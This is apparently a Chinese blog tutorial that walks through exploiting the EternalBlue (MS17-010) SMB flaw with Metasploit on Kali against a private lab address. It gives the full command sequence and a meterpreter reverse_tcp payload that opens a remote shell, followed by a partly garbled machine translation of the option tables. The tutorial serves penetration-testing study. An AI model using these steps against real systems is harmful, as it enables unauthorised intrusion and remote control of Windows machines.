Kali渗透第一章永恒之蓝

Kali登录
sudo su命令并且输入kali密码登录到root用户
使用msfdb init初始化metasploit

然后输入msfconsole进入工具

进入工具后
使用search 搜索漏洞
微软永恒之蓝漏端ms17_010
使用办法search ms17_010
看4个模块
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection

使用办法输入 use 前面编号或者全名如 use 0或use exploit/windows/smb/ms17_010_eternalblue

输入完成后查看配置show options

设置目标ip 输入set RHOSTS ip地址
设置完成在查看配置show options

配置好后run开始攻击

攻击完成后面help查看帮助信息
翻译解释
Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.19.129 yes The target host(s), see https:

                                         //docs.metasploit.com/docs/usi
                                         ng-metasploit/basics/using-met
                                         asploit.html

RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain

                                         to use for authentication. Onl
                                         y affects Windows Server 2008
                                         R2, Windows 7, Windows Embedde
                                         d Standard 7 target machines.

SMBPass no (Optional) The password for th

                                         e specified username

SMBUser no (Optional) The username to aut

                                         henticate as

VERIFY_ARCH true yes Check if remote architecture m

                                         atches exploit Target. Only af
                                         fects Windows Server 2008 R2,
                                         Windows 7, Windows Embedded St
                                         andard 7 target machines.

VERIFY_TARGET true yes Check if remote OS matches exp

                                         loit Target. Only affects Wind
                                         ows Server 2008 R2, Windows 7,
                                          Windows Embedded Standard 7 t
                                         arget machines.

模块选项(exploit/windows/smb/ms17_010_eternalblue):

名称当前设置描述

RHOSTS 192.168.19.129 yes目标主机，参见https:
/ / docs.metasploit.com/docs/usi
ng-metasploit /基础/ using-met
asploit.html
RPORT 445是目标端口(TCP)
SMBDomain no(可选)Windows域
用于身份验证。辊筒
y影响Windows Server 2008
R2, Windows 7, Windows embedded
d标准7目标机。
SMBPass no(可选)
E指定用户名
SMBUser否(可选)用户名
henticate作为
VERIFY_ARCH true yes检查远端架构m
漏洞利用目标。只有房颤
适用于Windows Server 2008 R2
Windows 7, Windows Embedded St
标准7目标机。
VERIFY_TARGET true yes检查远程操作系统是否匹配exp
loit目标。只影响风
Windows Server 2008 R2、Windows 7、
Windows嵌入式标准7
arget机器。

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh,

                                    thread, process, none)

LHOST 192.168.19.128 yes The listen address (an interface ma

                                    y be specified)

LPORT 4444 yes The listen port

有效载荷选项(windows/x64/meterpreter/reverse_tcp):

名称当前设置描述

EXITFUNC线程是退出技术(接受:"，seh，
线程，进程，无)
LHOST 192.168.19.128 yes监听地址(接口ma)
Y被指定)
LPORT 4444是监听端口

3406 2 2024-02-19

打赏一下，各位朋友请随意打赏！

×

如果觉得我的文章对你有用，请随意赞赏

取消